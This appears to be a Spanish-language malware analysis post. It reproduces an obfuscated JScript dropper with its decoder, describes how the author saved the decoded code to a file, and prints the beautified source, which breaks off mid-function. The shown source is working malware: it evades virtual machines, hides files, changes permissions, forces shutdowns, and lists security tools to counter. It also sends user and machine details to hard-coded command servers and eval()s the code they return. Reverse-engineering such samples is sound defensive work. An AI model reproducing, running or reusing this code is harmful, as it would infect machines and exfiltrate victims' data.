f01900306006j01200j05J07S06j05904607601j00u01602a04100G05S04e03e01704u08306O05b01p02I06s08004607803700105207r07904i00601F00p02M03d00b01N02400s03N03602F00o03d08205004507M07F04G03700b06r05t05c04j07N07007D06i05l04902p04204b05g06K05805G06C04606200T01f06h07K04l05s08406Q02c01u06D05l05305q00202106E05a01a02602l03g06J08103J02h04H05k02Q03H05e05201p00Q01K00905j04G04p05B01800l03a02701001n06807l03900H06H06202803G04406304103200t01K01003T07s04H02701100j01I02g03501T03106I07903N00n07p05207u04b01302T02F00B07G04406d05g07506106D07m01d02a08506r07108005B06r00504004100e03H00q06T05n04l08403101D00103h00603C05207g07J06K05p05202a03604202U07906406F04p06j06403700T00403q05706S07606004m08700101J07r06C01404304507407t04500s03I02701701602P00E03a04f08305c06P02T03O03j00l08604a00n03L03602307007S06407302F01C05G06A02K03S08004j02p01100k01p00501507m07604002n05l05106m05Q04200g07M05006607F05P06s04100R05F06b03M02q08504E05007j04A05K07507p04K07E05n04602803b04H08504000905D07202P02106s08606r05s00c03D05I06800q01I04h08204O07a02203c03501005B06906O06406E06100S03s07l06k01102p02J03404s05A00L03m02k01804c08506s08601r00j04R05h04b07O04u08303001g03S02r05308003001P02201l00a01o02201O07307J08105706g08202200T05M05205j07407P04b04506204K05504102800C03R03b00Q03f00L05g06M00d03u07206001I02504605706e05t01j02404f05R00103800r01k04N05M07d04p07S04g07105e06006k05906704G07803400507605I07K04803p00005j06h00301207r07403R02L08407501304206B04t00602O07h04s06605k02301703900k00B03d00703D07P05r02501306U05H00D03F07204b04707602l00U03n00t00f03f06006e04807i03101E06C05E04q07n05K07203L01f05H07n07N05c01702h05506k05308202401e01R02F07E04O06u04806007d00G02507505F05008207305j03400l04L05m05206m05906703j00u01e02Q08405503301T01603O04200C03E00400703302A01R06l05J01T02j03900l04407300U02407M06202q01D03K00g06B05s01f02S01c03101S02d04707600O02605i04J05a04d02h02100001U07L05304407N01600E02403302Q00f00e03a03I00101g02d05O07303t00d01402i00T01u00D02a04B08708704J01I03005O07305806n04300q03T00806I07906306n00D03601C02202100T03S02407p04906a05i05T06i05h06A06907I00a03e05005Q04T08205U06H05606A00003405T06I03D00f03g02005n07100F03300e04002O01301T03204200b07R04400j01S05h07305N05003G02606g06400c03G07105D04t08607l04F05307H06P04702R01P06905s01102a00p01502601304s08503d00u06807l05R06700M04306R06105q06N06n06407904p03501I02G01r06705t08504L01102700401Q08406j00D01205P06r03600h04B07701o02406Q05u06007605806J06m05900G03601s00604002T04d05g00d01b02n04206g05D01g02b00503f02303D07m06e00a01900S01s05F04A06T06400E03G05k06600p03Q05n08603C00606P05L05I06i02U01907j04905n07403900807S06e05q04R06807E07c04Q02701t01q02C07F05107P04R05007t05q06D03S00m07O05303700G05b04702M00804907006U05g01u02600J03300t03c06q05M02E01206P07704605L03U01806j04L00F04001802H03l00N01N02S01s02P07J07606607P00h02100i03P02401f07D04e02000I07S06C05704407t07105j07404201005107h00503300001907K06a01O00c00903f02C01500203P01N00u01m02704202p07906k01003f05207F03302d04k06101D00006g05B04000j06K07707F04S01802k01602o05k06d07S07400p03c05904h03903001o02500P03E00504002n01F05F06H04e05904407P05706T04300H02000m03C02G00a01G01P02t06G05a04N08606106E08604i01d02B07E04805g04i06L07m05T04R00C03i05D04c04i07H05806c01402H07E06D00001G05007400501602U03M00r02A04505604I05602400J03902805r04o06I07I04002P07105f02C01R05H04B01200607s07605G04905a06L00T03H07j06k03N02l06M08404i06406d07i02f03F03p02808406r02h01J07s04q08405200M03500G03m05f06808606S07506102c03600C03Q05n06l06T05f03I00c07106103O00106q05s05207S05604D06u06308406r03O00e07N04H01O02505j07304T07701S02207k05005F06H07605i06807906e05507907600q03r00g02001602404I07I03n00003100O06E05C00803707R04K00i03q04000E05p05102P01k01p00G03P02M02U01A07h04T03q00i04g08606t05c07k05401e02407904800m04307l04602701103b02c00601g01a00206F07I02l00f01703T00701a04002K01R03903p01B02A03d01800E05Q04i05208307g04a07m05205l04S06l05u06l05j05307J06907a01E02906908604j07804e07M07h05200401501i03N03L00S06o05C08104O00203a05a06T07t04r01802L04d07d03300I02n04102j01Q02P03S07r05c06s05807C04b03J01n07n05403400D05S06p02K01O05q06d07O04600a01404l05F07I06G02d01205704G06U05u06h06507s05L02201f05t07304302p07h06903R02502701g03N02S08304q03T00L00r03g03p00J00102h04707d06906104a07P02703g06U07o06104M00003u05o06b05D06F01i02503A02904A07k06M07k03U00H01200f00j03T06506h05g06K02801c06o08204705F05t04707206304507L06605N01h00o07Q04905E06e07U04905u04T04200N02J03f03702M01i00a05O07103t02808205103U02N03300C00303907t04s01L02L01802L07L04a03103800B03501B00100q01i00O01I02q01D02r01C05A07306q05k05307f05F06h00g03501200101102I02S01b06004B04607g03d02307207Q02A02001602D04Q06J05q04906007e01001405C04l03K02G05306205u07c08505600G02502002c03800401N02600f03U00M01N01T03k06805C04000I02n01106i04K04507406O04607a04l02301f06G05I03e00p03s00O04707l04300c00B02P03801Q04D07105D07302201204g08600P03G00Q03I06G06000F02L02f00h07608505C05201L00m00U02402700P00d02e06905O05L06600r03205Q06Q01502i02U01U00A02O06407901Q03E03F00304U08307L04705007P03900806207203J01D06507a08205S01802g04607802P01606n06407f05000N03R05e06L07K04t02C00M05U07c04G07202801G02U01j07H04i05407n07D04L00H03500s02204m06K07H05U02p01402Q01Q06l06303e01005206307905K02401807t04S05E07302o00a00c02I03T01b05307j00q03O04j07f07s04B04J07L06r05t02K01202q00406805305K08402201l05m06M08104F02I01500K03405307L01Q03803m01G04e05d05604C02703C00l03804U05c02p01803800L07B06l07906605B07O05O07104200G03r00s05e06C07O04A03P00503h02G01H03O06b06301003I00l03s01L02T00U03f06E05i02R01C07007U06406o07A04H04I07C00L01O04A06308204H05e06602K01705007q02203b01G02g01800902m01O04000e05308303m00I03E01003l00n04F06u06J05a03M00S02N01803h00Q06007007A04q07704O00T01M03L00203B02302A03404H08103o00k05207M05T07601f02D06u05h01U03G03D00B05c06p00903402g03M02901200f03d07605G00301G00I03806t06401102G00O04008104q04707r06g04t06f06303Q00E01003m01I02M05305804T05D03t02o04807C03R00a01o02I04g08104o08102N01H01B02606N05A07L05203G02I03203r07308607a06a05m04u00b03C00m03J05506f07c06k00901F01M00N03f02d07G06b03500B04b07B07k04603n00q00r02p05t06T07506303400002R01e06G05803700b00G04205605101700404F05j04m07806p05F02102e02701i02801401702d04807T06O06307205P00i03905704b07604706E04o07J05405S06k01a02s07505F06s05O05M07307t06b01p00A07f05P07604703R00B04d07802501703T00M01k03207O06801a00r01100E06D05805F06c01N02s08106R07107G04B05A07E06H06q05C01p02R02601J02d01F07r07307M06c07T06j06k05G02G01100C03r03p03104h08500N02002703C07405M05J06702S03N07a04N05207F08004F05007Q04605f06s05b01900103o02G00O03f01A02t03001501E02O03300106707M04J08501f02T02H01200401d00G01O06j07F04u08104G07a03700900103l01I02303500706p05L04j05f04t05u03103K04001003g02f01U02R06l05F01D02201500404302I00402403m02L04m06306J05302p03q01t00j06k05402903A01j00G07408205804C02F01U02401j02S03k00h01N02100l02N03u06805D01502P05504603S02r01400100R01T07806G02i01108104D00F01507j06h07706g00701a03G00R03H00c00E04108307004E05f06S07R06H07j03402C01D02u04H08503i02606807c00g01R02R03Q01t02o00203k07g04G07Q06N01r00Q06c07b03m02m02q03m04p07C07804L00L02001200601h00q02f03605c06n04a07B07g04g06L07k06s07O01700a07T06C05L05107508704705o06L07d01702T06P05L02c01C01L02204c07i06H05806504r01Q02U00P01H00i03c00A03q03C00K07506304f07h04i08201e02G02201901900000c03C05704f05E06o01k02g03800O06806501402202501307P04A06507302B01200h01q05b06902N04004L07H04m07m07H06304a06r07o04m01702m02T01J05n06806F06304b05E04806T00O03U07d04O05t06n06006G06e06204R06N02301l01502A06e05906I04600103300E03605C06805I04704t07H07M05406e05902C01400n03600901201D00e00e02K04607506707A06i07C00t01K03800m06L05c04S07O05B06600a04202603F04102M03g02I00a01o03O00H00901202b03E01a02s06206B05207l06k06002E01a07305m02S02003400J01p02J04o07902k01O04q05P01e00403602701100604i07902801A06B07i03900M01M02207704n03I00701900002700i01803N01N02N00g03506805g00N03a07N04801q00n04M06701A02c03q00500L04000403N06905s08406008504C03700807O05207o06507406206i05603400407h06906504802q01f06k05k07f04U02G03h01O02506705702K03I01i02n02000m07d06a06I05t05906702301d02F01U08307006A07k05804c08507601N03D05508405P04Q00E01607J04808605407h06801402603j02t02803703s02b01801006h07G03103q07c06K05604706h07C03u00h02n01703Q02n02u03A02n01t04000q00801105e08600L02802003005a06t03001L04P07c06805R05l05305807902102F05806a00J03904507J07A04A06B05g01k02904s07I07107r00B03A05M06Q00503e02K01M01D02q01q02j03S02902g04204405b04c05j07j06104n06605i06K06h05u03I00602T01c07b04k00l01S02I00h01m02906407004a07Q08104o08005201L02s07r04402p01501E00508006E01Q00G06A08100i01G04g07b00403802f03802s01u05205R04i05h04f06103d03003r02S03203P01L00T02K01a02601h02O01501E02m06106601U03202a03903f00802u01q01n02S08105105806t06M05Q02t00t04m08306T06104407c01400B06705q03p00L07007N03a00q00o03u02E01E05A06n02601804507g00601F07e04602B03301O02e06S05G06d04K01403j03600001402j05U06m00n03a01E02r01800905L06704407s04d07700303q01S00j07s07302H01j05208004807f05007F03e00e08006u03E00207j04e01F00605C06Q06A05m06o07m02100200401L03p02I03c02h05e07604I07707B06506M07703F01I05M04J03t02906304f05l04T04100907p04400003s08304407O04N03U02n06m05O07a04g02F01U07905007405004300m07P05302201601l00s01603l04806T03I00C00703O03500b01D02U05L06A06b07I03h01U07704705U06h00603i03600J03a00J06208207005H03J00s00n03U03b01708405203500F00P04004002I07f05107105U06D07I00M01o07706m05504d03K03005407K04i08300q01L04E08100O03J01602201R02o02Q01L03c01D07i04N07405t04O07u03p00305T06I03h00b06r08502t03s02i01800b03r08405405r06a07L04B03E00R03400L00d01405l06r03r00002002t04805B05B04e05305u05M04N05704906b07l08104H04P07T00501F06a07a00901C03t02s02I03q06L07b01R02k00R03T04S05l01R03002L03R00801B05q04906c07O07I06F03602C02N03s06D07C04103205l05104T06101E03204h08000f03404C07g06805m06t07S02503i05K05405g04600R03905i06K00703907C04L02d01905R07503103p00U03U03K02Q02u01805A06u05s06n01p02J01K03005806803Q00R06h05c02401S03U00003M00705f06U06B06200t03905406m03I00U03g02i07704601U00j05k06602K01307n04P02A01705907n04t08406605t03g00P05107102901f08004o02o01k04102n00203g03500406a05B07706h05K06d05506702T03m03800207G06802Q03t07i07202G04206807704905h05l05100901I00201F04L05L06707O03s02i01S02803n00N01102301n02405H06L01j02s01l00s05008606d07L01L02H01F02L01702t01s02l04c08200e01701b00Q04M06105Q04t03h00T00M04203L00j06M08006I08507407R04c05907H04T02G01608306p03602C01S00n02A01408304K00j01f02m03707g06o05108606J06504F07L05108506c05I02201u01K02i03c00807B04k01a02c02901g04705g03600607806e05o06E08104805607305d06707e04508006m00e03803j00R07607t02501P00g03903F00d01F02U06S07T03101T05806706106e00601s07b04405305r00Q01p02Q01E04B07R07j04D02601n07r04805b06Q00903902o01h05O07102501g05108104103201300B04L06006F07805f07303k01005B08507a06p00502q03203606t07804f05p03r02S02400u01b03p00001303602R06q07t04907006K04M03801506306j03e00R00U02s01K02k04807N05506707504604R06H05707n00K03u02c01c04Q08303201N03600D06506U00902n02o00a04D05g04B05J02703H07B04G00303507706e06J05F07Q06U06F07I01L00408506l07d06a06504Q07607Q07Q04L06m05N01l02g07507a06705803G00f00l03902703H07408706407906B04t07008301K00O06K05B05N06p02703g06S05M02n04202000s01G01002100B02u04206707F05205r03o02P08506p06M06002N01705Q04R03d02J03h00q02t01a04100400j03b03H00c04d05c00K03q00103M03J00L00m03q01202N06g05k01L03l00203g01q02N01202706407203N00607J06a04P07U02601706206L03203P03M00e07d04905H06J04q07901402205107R02j03s07U04M01800e07005707i04q00J03p06705K02C02006C07l02201301I02l00m03803103Q01F00205Q06t06h07c01S02q03m00s05L06601803105b07706n05t07g04906R05l00601f06A04N03801N05408400403p00U03Q04407n05007M01800905H08707o04m06O05501003P01j02405f07501303700h03703101j05a06f04M07302m01m06I05605906705604H07306407704604Q07J05o05400q01S02303K03902h02703C03300507F04a00h03802L03U05408501L02o00H03E01g00603G02O04e08606q05b05Q06I01s02206G04902301h04e05906Q05S04Q08207l04505407J08605003E02502I03S01802s05a06C00703904h08103500106506t03302a00F03d07R07405p06l05i06m01B02q05u06I00901805s06a06106P00o04105j06800m03T00c02B03T00204U08700p03t06o05C06805r00h03N00001904505803a00G01003F04200t00O03D02T01J07q04700N03600t01k02002T06q05h08005200Q01P02p03u02b03h05O04L03I02A06304q00102o02a00R03j00j03D00O08404P01d02u03h00q06004O04906s05606801q02D01302D04U07h05007M00T02T01302p03300C05F06c06D04D07o04k02601a07006206D07J07P06r03r02S00501603p02J07906f07605S08004t03q03203D00d05405P02I03l00k01604202C07k06L03C02207Q07604805b01100200701c06m07P06l07K01n00q04102f03G02600B01802600J05306j07205T02H01u07a04E06Q05903A00J06G07B05T06f00H03706a05i07r04406S08601600c07n04H06l05n00s04306o05o04d08501d02h05007q07r07304K07s07307s04000705l07E05M07902301302901M02H01701q02B01U02b07407Q03J00107q04A00k04106O05B05n04u02d03500d03j04C08603k00G04707o07408503C00T00p04306F05K05605100g01j06f05h06F07i00901607D04d04P07804100R05g04k05506f05008504U05N05208700d01404u08401202a03U00n05008604e06l07K04P06j05900Q03c04G08003900l02203b03300803500602e03800C01607O04903a00L06106806I05S05i06807105j06107403P02d07K04J06s08005o07301A02r04N07t07804J00c02q04300Q07q04F06r05603q01i07704D00s03J05706D00601F05n07107206503i02503L02507806E03802B07405e04f07k05e06l04606506605K07q04B07E04503j03100M03705D06J04J07l01q03007i05F01C02902102L00h01q05r05402303g05f06b01m02308105403402H06o05m00b03a00H04208704G02401807g06707D06l04m07m03B00b00o03s05E07405t07202i01p05a04h00703504k05U04K07i06006d07904B05Q07002o01602p01J00001100c03R00p03E05U06605207d02701i03a00107704A06304406m05O04607k05108603b02201u00K07i06603m00g03E00405J06I05604D06e07804g05C07A06702503h01900A02i03u01r02r06406N03400300r01K07607t00u01M03K02l02403i04705602100k01N02N06306o03Q00l07r07303T02L07906f07F06G04302K01C00907r07603J00j03O00q04507A07u07604E05807M06A05a04b02A03800h01k06004L04707707904h00103606I07B07G06603k02s03t00P03U00k05G06f04N06100101901l01007l04H02J02004T08306F07801f00707g06B02t01l03800H06805903T02902B01C05b04c02a01806506l01902F06705K03301l07C04401q02303400L02a00e06J05904p08105G06k06S08603u00j04A07907i06D08406K01800b06s07e03O02U03802b04g07A02C02001O02j04a05d00503l00G03501502F06K06007i04I08506r04p07801S03002701405T04L06304l06H05905b06o06705c05105n00L03P06I05507m04400603O06n05P02d03600k01u08604700d03H02701505g07606q05s03i00701n00U03g00804T05L07H04l00M03e04S08501602D04I08208306P02701E01k02P07507U04906404J07G07R05007904K05T04K03P02F01t00700o01I05906j00q04006K07d02D01I06905u00603C05s05407R07403B02B03D02p06U07c02803A03h03206204p05308005906h07804N03F02608606b02u03A02q03k03c00T01d03102o01G04100607408107f06605q04R03702807i06D08006F01U00k03r02506S05l01b02704I08401I00P04n07c06107100h03600s01T06s06507t06h05p05101r02M05606A00G03a06d07E02E00802e01e01r02G01003T03602c04705i06k05E01l02J06o05B01u03c04407G04507J02m01i05005O01900102h03N00A03603g02802403k02e04100j01C01f02d06q07702o03b01N00B04805h03D00401R03200703J02E03F00302900o03S07k04t07Q04Q07107q06g07b01502508005202301m06307g03h00703L01005o06S00g01p08306o07j06t07605h03001n01n00u01O00U04U05O00t02c01R03C07U04o06605n00T03N01H02206805R08206Q06805M02G01303S00S02h01B06I06204u05N01g00T06B05506B07T04M06105G06S06207605806804507s06r05R04M08207706E07I04I04i05c04808706b05h05806b05005O04g07T02N01g01902904405D04H05905Q04c03603102A03r00J01r07a04507D04o00103702U01u01d02905U04606107402k01U02h01U05105P03e00t05308706u05f07Q06P04n08202g03M02c03506l05600N03L03s00E02903a03401603700507904Q00803G04805i00L01S04L07t03C00C06d05O03701h07E04I01602A07n04P07a06H05u04k01400O06605E07D06J03G02n01P03006U07I03e02N01m00804R06502002i00U03u02o01206N07o05E07k02g01G01E02R03p00j00t01l06707M07D04504B07903201c01403q04A07M05o07506J05d02n04100E01800601U01s02a07305s04202o07207p05h04908405g00302I00j03j03M00101i02Q02201H01602J08206q01302j01g02505c06807B04507j05108606S04805R07G04G03702p05l04T06G05S05f06l07B04C07C04q00t03r01600506u06407005r01T02g03003O03t00C01102304d08304S05t08004L02J03f04L05u04807h08105104000B05406505F07l01G02G07S04500L03j06807I03s02P02301700i03q07105j04O06602801g00j04201E02a07k06b07607t03O02g07H04704B05h05i05106708107405t07h07506H07S02F03j02Q03j00C03502H01b01E02S07508603k01m03U00q04t07k07d04705N05003M03000903h04R07P07N04805N07d06e05601a02603J00l00801105a04g07707203800M05l07203Q03207H06903103q00e02r01903U01M02o01T02G04907J05r06c06a05l01p00m02k01206905k01a02E03101s07k05208006M07b06s05308300c02107706F00204300C01602503e07K06a00001S"["\s\p\l\it"]("");
var P = this, r = String, N = "\len\gt\h";
var e = function(l) {
  return parseInt(l, 31)
}, p = function (S) {
  return e(S[0]) ^ e(S[1])
};
var v = [];
var z = "";
var Q = "fr\o\m\C\h\ar\C\o\d\e";
for (var y = 0; y < b[N] / 3; y++) v[y] = "";
for (var S = 0; S < b[N]; S++) v[Math.floor(S / 3)] += b[S];
for (var J = 0; J < v[N];) z += P["r"][typeof prompt == "undefined" ? Q : 1](p([v[J++], v[J++]]));
P["\Fun\ct\i\on"](z)();


al verlo me pareció complicado de entender pero después de un rato di con el truco.
remplace las ultimas lineas por estas:

var P = this, r = String, N = "\len\gt\h";
var e = function(l) {
  return parseInt(l, 31)
}, p = function (S) {
  return e(S[0]) ^ e(S[1])
};
var v = [];
var z = "";
var Q = "fr\o\m\C\h\ar\C\o\d\e";
for (var y = 0; y < b[N] / 3; y++) v[y] = "";
for (var S = 0; S < b[N]; S++) v[Math.floor(S / 3)] += b[S];
for (var J = 0; J < v[N];) z +=  String.fromCharCode(p([v[J++], v[J++]]));


 var fso  = new ActiveXObject("Scripting.FileSystemObject"); 
 var fh = fso.CreateTextFile("Test.js", true); 
 fh.WriteLine(z); 
 fh.Close(); 
//P["\Fun\ct\i\on"](z)();


la ultima linea que puse como comentario es la que ejecutaba todo el código desde una función, así que la deje como comentario y la variable z es la que portaba todo el código ya descifrado y para no desaprovechar el contenido de la variable z cree un archivo llamado Test.js para que se aguardara el código en el cuando se ejecutara.

al ejecutar el script me creo el archivo Test.js con todo el código descifrado, pero con la diferencia de que todo estaba desordenado, así que me fui a una pagina para que me lo ordenara un poco esta es la web:

http://jsbeautifier.org/

solo pegue el código y le di clic al boton   Beautify JavaScript or HTML

y el resultado fue este:

(function() {
    (function(a1, a2, a3, a4) {
        try {
            var a = GetObject("winmgmts:root\\cimv2"),
                b = [a1 + "Processor" + a2 + 'QEMU%"', a1 + "Processor" + a2 + 'Bochs%"', a1 + "BIOS" + a3 + 'QEMU%"', a1 + "BIOS" + a3 + 'innotek%"', a1 + "BIOS" + a3 + 'Xen%"', a1 + "BIOS" + a3 + 'Bochs%"', a1 + "DiskDrive" + a4 + 'QEMU%"', a1 + "DiskDrive" + a4 + 'Red Hat%"', a1 + "DiskDrive" + a4 + 'Virtual HDD%"', a1 + "DiskDrive" + a4 + 'VMware%"', a1 + "DiskDrive" + a4 + 'VBOX%"', a1 + "DiskDrive" + a4 + 'Xen%"', a1 + "DiskDrive" + a4 + 'Bochs%"', a1 + "SCSIController" + a3 + 'Xen%"', a1 + "SCSIController" + a3 + 'Red Hat%"', a1 + "SCSIController" + a2 + "Citrix%", a1 + "SCSIController" + a3 + 'Xen%"', a1 + "ComputerSystem" + a3 + 'Parallels%"', a1 + 'Process WHERE Name="CaptureClient.exe"'];
            for (var i = 0; i < b.length; i++)
                for (var e = new Enumerator(a.ExecQuery(b[i])); !e.atEnd(); e.moveNext()) WScript.quit()
        } catch (e) {}
    })("SELECT * FROM Win32_", ' WHERE Name LIKE "%', ' WHERE Manufacturer LIKE "%', ' WHERE Model LIKE "%');
    var _ = {
            v: "211",
            a: "",
            t: "1426794745"
        },
        a = new ActiveXObject("wscript.shell"),
        b = new ActiveXObject("scripting.filesystemobject"),
        h = function() {
            return ((1 + Math.random()) * 65536 | 0).toString(16).substring(1)
        },
        d = a.environment("process"),
        f = d("username"),
        g = d("computername"),
        ru = new ActiveXObject("shell.application"),
        lo = [],
        fup = [],
        dod = "",
        dot = 0,
        hf = function(e) {
            try {
                var t = b.getFolder(e);
                t.attributes = 2
            } catch (n) {}
        },
        sc = function(e) {
            e += "";
            var t = 0;
            for (var n = 0; n < e.length; n++) t = (t << 5) - t + e.charCodeAt(n), t &= t;
            return Math.abs(t)
        },
        ha = function(e) {
            var t = "",
                n = sc(e);
            for (var r = 0; r < sc(e) % 5 + 5; r++) n = sc(t + n), t += String.fromCharCode(n % 25 + 97);
            return t
        },
        zzo = function() {
            var ttw = ["https://www.microsoft.com/", "https://www.google.com/", "https://www.bing.com/"];
            for (var i = 0, h, wep; i < ttw.length; i++) try {
                var h = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");
                h.open("GET", ttw[i]), h.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"), h.setRequestHeader("Cache-Control", "no-cache"), h.setRequestHeader("Pragma", "no-cache"), h.setRequestHeader("Connection", "close"), h.send(""), wep = (new Date(h.getAllResponseHeaders().split("Date: ").pop().split("\n").shift())).getTime() / 1e3;
                if (1388534400 < wep) return wep
            } catch (e) {}
            return !1
        },
        ent = function(efn) {
            try {
                a.run('%comspec% /c cacls "' + efn + '" /T /E /G Users:F /C', 0, !0)
            } catch (e) {}
        },
        hr = function(e) {
            if (e) var t = 1,
                n = 1;
            else var t = 2,
                n = 0;
            try {
                a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", t, "REG_DWORD")
            } catch (r) {}
            try {
                a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", n, "REG_DWORD")
            } catch (r) {}
        },
        rc = function(key, str) {
            var s = [],
                j = 0,
                x, res = "";
            for (var i = 0; i < 256; i++) s[i] = i;
            for (i = 0; i < 256; i++) j = (j + s[i] + key.charCodeAt(i % key.length)) % 256, x = s[i], s[i] = s[j], s[j] = x;
            i = 0, j = 0;
            for (var y = 0; y < str.length; y++) i = (i + 1) % 256, j = (j + s[i]) % 256, x = s[i], s[i] = s[j], s[j] = x, res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
            return res
        },
        cob = function() {
            return Math.floor((1 + Math.random()) * 65536).toString(16).substring(1)
        },
        kk = 1,
        zbo = ["regedit", "windows-kb", "mrt", "rstrui", "msconfig", "procexp", "avast", "avg", "mse", "ptinstall", "sdasetup", "issetup", "fs20", "mbam", "housecall", "hijackthis", "rubotted", "autoruns", "avenger", "filemon", "gmer", "hotfix", "klwk", "mbsa", "procmon", "regmon", "sysclean", "tcpview", "unlocker", "wireshark", "fiddler", "resmon", "perfmon", "msss", "cleaner", "otl", "roguekiller", "fss", "zoek", "emergencykit", "dds", "ccsetup", "vbsvbe", "combofix", "frst", "mcshield", "zphdiag"],
        eth = function(str) {
            var r = [],
                rr = "",
                e = str.length,
                c = 0,
                h, x = "rswhjUqutGNXSiQYVOWkZRnHgImzJoMyLvPTlKxp".split("");
            while (c < e) {
                h = str.charCodeAt(c++).toString(16);
                while (h.length < 2) h = "0" + h;
                r.push(h)
            }
            for (var i = 0; i < r.length; i++) Math.round(Math.random() * 1) && (rr += pw(x)), rr += r[i], Math.round(Math.random() * 1) && (rr += pw(x));
            return rr
        },
        shh = function(o) {
            for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);
            return o
        },
        kp = function() {
            b.fileExists(ofb + ha(g + "09")) && WScript.quit()
        },
        zt = function() {
            try {
                var t = b.openTextFile(ofb + ha(g + "00"), 8, !0);
                t.close(), a.run("%comspec% /c shutdown /p /f", 0)
            } catch (e) {}
        },
        fuu = function() {
            var ttt = [];
            for (var i = new Enumerator(b.getFolder(ofb).Files); !i.atEnd(); i.moveNext()) b.getExtensionName(i.item().Name) == "exe" && ttt.push(ofb + i.item().Name);
            return ttt
        },
        sha = function(too) {
            for (var i = 0; i < lo.length; i++)
                if (too) try {
                    fup[lo[i]] = b.openTextFile(lo[i], 8, !0)
                } catch (e) {} else try {
                    fup[lo[i]].close()
                } catch (e) {}
        },
        dof = function() {
            if (dod == "" || dot + 216e5 < (new Date).getTime()) {
                var doh = shh(["http://jtvnm.com/", "http://109.95.210.108/", "http://googlpht.com/", "http://91.200.85.80/"]),
                    dec = "";
                for (var doi = 0; doi < doh.length; doi++) {
                    try {
                        $("asl", doh[doi]);
                        var hgf = zxcvb;
                        dec = doh[doi]
                    } catch (e) {} finally {
                        delete zxcvb, delete hgf
                    }
                    if (dec != "") break
                }
                return dec == "" ? !1 : (dod = dec, dot = (new Date).getTime(), dod)
            }
            return dod
        },
        $ = function(fab, fat) {
            var m = ofb + ha(g + "06"),
                q = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"],
                s = "";
            for (var r = 0; r < 26; r++) s += q[Math.round(Math.random() * 35)];
            var v = eth(rc(s, fab + ";v=" + _.v + "&a=" + _.a + "&t=" + _.t + "&u=" + escape(f) + "&c=" + escape(g) + "&p=" + escape(w) + "&i=" + escape(tff) + "&e=" + escape(ll.join("-")) + "&b=" + escape(vn.join(".")) + "&s=" + escape(su))),
                yun = fat === 1 ? dof() : fat;
            if (yun == 0) throw Error();
            var j = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");
            j.open("POST", yun), j.setRequestHeader("Cache-Control", "no-cache"), j.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), j.setRequestHeader("Content-Length", v.length), j.setRequestHeader("Cookie", "PHPSESSID=" + s), j.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"), j.setRequestHeader("Pragma", "no-cache"), j.setRequestHeader("Connection", "close"), j.send(v);
            var c = new ActiveXObject("ADODB.Stream");
            c.mode = 3, c.type = 1, c.open(), c.write(j.responseBody), c.saveToFile(m, 2);
            var k = b.openTextFile(m, 1),
                l = k.readAll();
            k.close();
            try {
                b.deleteFile(m)
            } catch (e) {}
            for (var iz = 0; iz < l.length; iz++) try {
                var pa = parseInt(l.substr(iz, 6), 36),
                    pb = parseInt(l.substr(iz + 6, 6), 16),
                    pc = parseInt(l.substr(iz + 12, 7), 36);
                if (pa + pb == pc) try {
                    var sf = l.substr(iz, 19),
                        lan = parseInt(l.substr(iz + 19, 4), 36),
                        fh = l.substr(iz + 23, lan),
                        uq = "";
                    for (var o = 0; o < fh.length; o += 2) uq += String.fromCharCode(parseInt(fh.substr(o, 2), 16));
                    var hd = rc(sf, uq),
                        yt = hd.substr(0, 64);
                    if (yt.substr(0, 6) == "0QFQXx") {
                        eval(hd.substr(64, hd.length - 1));
                        return
                    }
                } catch (e) {}
            } catch (e) {}
        },
        sk = function() {
            var foc = 0;
            try {
                var cbo = ofb + ha(g + "11"),
                    t = b.openTextFile(cbo, 8, !0);
                t.close(), ent(cbo), foc || sha(0), foc++, ru.shellExecute(pw(w0), '"' + WScript.ScriptFullName + '" ' + ha(g + "10"), "", "", 0)
            } catch (e) {}
            try {
                var cbo = ofb + ha(g + "13"),
                    t = b.openTextFile(cbo, 8, !0);
                t.close(), ent(cbo), foc || sha(0), foc++, ru.shellExecute(pw(w0), '"' + WScript.ScriptFullName + '" ' + ha(g + "12"), "", "", 0)
            } catch (e) {}
            foc && (WScript.sleep(1500), sha(1))
        },
        pw = function(mp) {
            return mp[Math.floor(Math.random() * mp.length)]
        },
        w = "000";
    try {
        w = a.regRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductID")
    } catch (e) {}
    var vn = [0, 0, 0, 0];
    try {
        for (var i = new Enumerator(GetObject("winmgmts:root\\cimv2").ExecQuery("SELECT * FROM Win32_OperatingSystem")); !i.atEnd(); i.moveNext()) {
            vn = i.item().version.split(".");
            if (vn[0] >= 5) break
        }
    } catch (e) {}
    vn[0] || (vn[0] = b.folderExists(d("systemdrive") + "\\Users") ? 6 : 5);
    var ll = ["", ""];
    try {
        var osl;
        for (var i = new Enumerator(GetObject("winmgmts:root\\cimv2").ExecQuery("SELECT * FROM Win32_OperatingSystem")); !i.atEnd(); i.moveNext()) {
            osl = (osl = i.item()["OSLanguage"].toString(16)).length == 4 ? osl : Array(5 - osl.length).join("0") + osl, ll = a.regRead("HKLM\\SOFTWARE\\Classes\\MIME\\Database\\Rfc1766\\" + osl).split(";")[0].split("-");
            break
        }
    } catch (e) {}
    try {
        var w0 = [],
            ofb = !1,
            gg = b.getFolder(d("userprofile") + "\\..\\");
        for (var i = new Enumerator(gg.SubFolders); !i.atEnd(); i.moveNext()) {
            var bfo = i.item() + (vn[0] < 6 ? "\\" : "\\AppData\\Roaming\\") + ha(g + "02") + "\\";
            if (b.folderExists(bfo)) try {
                var ZE = b.openTextFile(bfo + ha(g + "05"), 8, !0);
                ZE.close();
                var hd = bfo + ha(g + "03"),
                    bfi = bfo + ha(g + "04") + ".js";
                ent(bfo + "*"), hf(bfo), ofb = bfo;
                try {
